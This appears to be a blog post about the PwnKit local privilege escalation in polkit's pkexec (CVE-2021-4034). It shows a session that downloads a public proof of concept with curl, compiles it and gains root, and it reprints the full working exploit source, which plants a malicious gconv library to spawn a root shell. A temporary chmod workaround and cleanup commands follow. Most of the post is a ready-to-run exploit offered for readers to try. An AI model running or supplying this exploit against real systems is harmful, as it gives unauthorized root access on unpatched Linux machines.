Local Privilege Escalation in polkits pkexec

The big news in Linux today is the Local Privilege Escalation in polkit’s pkexec (CVE-2021-4034), with Arstechnica leading with, “A bug lurking for 12 years gives attackers root on every major Linux distro - It’s likely only a matter of time before PwnKit is exploited in the wild” Needless to say, I immediately had to try it out on my own, so I got on one of my Debian GNU/Linux servers to test it. Spoiler: it worked, here’s how you can try it too.

Howto

1
# id
2
uid=1000(fak3r) gid=1000(fak3r) groups=1000(fak3r),27(sudo)
3
$ curl -O https://haxx.in/files/blasty-vs-pkexec.c
4
$ gcc blasty-vs-pkexec.c -o pkexec-poc
5
$ ./pkexec-poc
6
[~] compile helper..
7
[~] maybe get shell now?
8
# id
9
uid=0(root) gid=0(root) groups=0(root),27(sudo),1000(fak3r)
10
#

Workaround fix (temporary)

While this is bad, here’s a quick workaround, remove the sticky bit from the binary - it’s certainly untested, and will be null once a patch is released:

1
chmod 755 /usr/bin/pkexec

Cleanup

To remove the downloaded, and generated, code:

1
rm -rf pkexec-poc blasty-vs-pkexec.c GCONV_PATH\=. lol payload.*

Code

In case the C code is pulled, here’s it is, again, I grabbed it from haxx.in.

1
/*
2
 * blasty-vs-pkexec.c -- by blasty <peter@haxx.in>
3
 * ------------------------------------------------
4
 * PoC for CVE-2021-4034, shout out to Qualys
5
 *
6
 * ctf quality exploit
7
 *
8
 * bla bla irresponsible disclosure
9
 *
10
 * -- blasty // 2022-01-25
11
 */
12

13
#include <stdio.h>
14
#include <stdlib.h>
15
#include <string.h>
16
#include <unistd.h>
17
#include <sys/stat.h>
18
#include <sys/types.h>
19
#include <fcntl.h>
20

21
void fatal(char *f) {
22
    perror(f);
23
    exit(-1);
24
}
25

26
void compile_so() {
27
    FILE *f = fopen("payload.c", "wb");
28
    if (f == NULL) {
29
        fatal("fopen");
30
    }
31

32
    char so_code[]=
33
        "#include <stdio.h>\n"
34
        "#include <stdlib.h>\n"
35
        "#include <unistd.h>\n"
36
        "void gconv() {\n"
37
        "  return;\n"
38
        "}\n"
39
        "void gconv_init() {\n"
40
        "  setuid(0); seteuid(0); setgid(0); setegid(0);\n"
41
        "  static char *a_argv[] = { \"sh\", NULL };\n"
42
        "  static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
43
        "  execve(\"/bin/sh\", a_argv, a_envp);\n"
44
        "  exit(0);\n"
45
        "}\n";
46

47
    fwrite(so_code, strlen(so_code), 1, f);
48
    fclose(f);
49

50
    system("gcc -o payload.so -shared -fPIC payload.c");
51
}
52

53
int main(int argc, char *argv[]) {
54
    struct stat st;
55
    char *a_argv[]={ NULL };
56
    char *a_envp[]={
57
        "lol",
58
        "PATH=GCONV_PATH=.",
59
        "LC_MESSAGES=en_US.UTF-8",
60
        "XAUTHORITY=../LOL",
61
        NULL
62
    };
63

64
    printf("[~] compile helper..\n");
65
    compile_so();
66

67
    if (stat("GCONV_PATH=.", &st) < 0) {
68
        if(mkdir("GCONV_PATH=.", 0777) < 0) {
69
            fatal("mkdir");
70
        }
71
        int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777);
72
        if (fd < 0) {
73
            fatal("open");
74
        }
75
        close(fd);
76
    }
77

78
    if (stat("lol", &st) < 0) {
79
        if(mkdir("lol", 0777) < 0) {
80
            fatal("mkdir");
81
        }
82
        FILE *fp = fopen("lol/gconv-modules", "wb");
83
        if(fp == NULL) {
84
            fatal("fopen");
85
        }
86
        fprintf(fp, "module  UTF-8//    INTERNAL    ../payload    2\n");
87
        fclose(fp);
88
    }
89

90
    printf("[~] maybe get shell now?\n");
91

92
    execve("/usr/bin/pkexec", a_argv, a_envp);
93
}